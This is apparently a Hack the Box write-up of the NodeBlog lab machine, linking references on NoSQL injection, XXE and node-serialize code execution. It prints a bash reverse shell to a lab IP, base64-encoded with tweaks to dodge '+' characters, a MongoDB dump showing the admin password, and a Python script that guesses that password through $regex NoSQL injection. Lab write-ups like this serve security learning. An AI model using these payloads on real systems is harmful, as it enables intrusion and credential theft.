Hack the Box : NodeBlog

Encoding payload part was hard.

URL encode, changing some special characters, base64…

Hack the Box : NodeBlog

payload part was hard.00:30 feroxbuster 00:47 NoSQL injection01:20 XML external entity injection01:52 no...

www.youtube.com

00:47 NoSQL injection

NoSQL injection - HackTricks

book.hacktricks.xyz

01:20 XML external entity injection

What is XXE (XML external entity) injection? Tutorial & Examples | Web Security Academy

In this section, we'll explain what XML external entity injection is, describe some common examples, explain how to find and exploit various kinds of XXE ...

portswigger.net

XML External Entity (XXE) Processing | OWASP Foundation

XML External Entity (XXE) Processing on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of softwar...

owasp.org

01:52 node-serialize Code Execution vulnerability 

node-serialize vulnerabilities | Snyk

Learn more about known vulnerabilities in the node-serialize package. Serialize a object including it's function into a JSON.

security.snyk.io

02:44 reverse shell

'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1'

└─$ echo -n 'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC44LzEyMzQgMD4mMQ==

"+" did tricky thing. added one more space to get rid of it.
└─$ echo -n 'bash  -i >& /dev/tcp/10.10.14.8/1234 0>&1' | base64
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuOC8xMjM0IDA+JjE=

There's still "+".
└─$ echo -n 'bash  -i >& /dev/tcp/10.10.14.8/1234  0>&1' | base64
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuOC8xMjM0ICAwPiYx

03:08 mongodb

> show dbs
admin   0.000GB
blog    0.000GB
config  0.000GB
local   0.000GB

> use blog
switched to db blog

> show collections
articles
users

> db.users.find()
{ "_id" : ObjectId("61b7380ae5814df6030d2373"), "createdAt" : ISODate("2021-12-13T12:09:46.009Z"), "username" : "admin", "password" : "IppsecSaysPleaseSubscribe", "__v" : 0 }

List Users — MongoDB Manual

www.mongodb.com

03:34 password brute force script using $regex

$regex — MongoDB Manual

pattern matching on strings in MongoDB 6.0

www.mongodb.com

import sys
import string
import requests
import json

def make_password(pswd):
    payload = '{ "$regex": "%s"}' % pswd
    login_data = {"user":"admin","password": json.loads(payload)}
    req = requests.post("http://10.10.11.139:5000/login",json=login_data)
    if "Invalid Password" in req.text:
        return False
    return True

password = '^'
result = False
while result == False:
    for i in string.ascii_letters:
        new_password = password + i
        sys.stdout.write(f"\r{new_password}")

        if make_password(new_password):
            password += i
            break

Maybe I should add counter to stop its loop in the end.